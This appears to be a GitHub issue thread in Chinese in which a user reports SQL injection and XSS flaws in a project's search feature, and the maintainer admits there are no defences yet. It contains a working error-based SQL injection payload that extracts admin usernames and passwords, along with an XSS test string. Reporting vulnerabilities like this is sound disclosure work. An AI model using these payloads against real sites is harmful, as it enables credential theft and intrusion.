搜索处SQL注入漏洞和XSS漏洞 #3

thiscodecc · 2019-10-25T07:49:13Z

在搜索处请求如下参数会产生SQL注入漏洞
a1%27%20and%20updatexml(2,concat(0x7e,(SELECT%20concat(username,%27=%27,password)%20FROM%20admin_user)),0)%23
如图

输入如下参数会产生XSS漏洞
";alert(1);//

miansen · 2019-10-30T08:43:58Z

谢谢您提出的问题~
目前 SQL 注入和 XSS 攻击还没有做相应的防御措施

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

搜索处SQL注入漏洞和XSS漏洞 #3

搜索处SQL注入漏洞和XSS漏洞 #3

thiscodecc commented Oct 25, 2019

miansen commented Oct 30, 2019

搜索处SQL注入漏洞和XSS漏洞 #3

搜索处SQL注入漏洞和XSS漏洞 #3

Comments

thiscodecc commented Oct 25, 2019

miansen commented Oct 30, 2019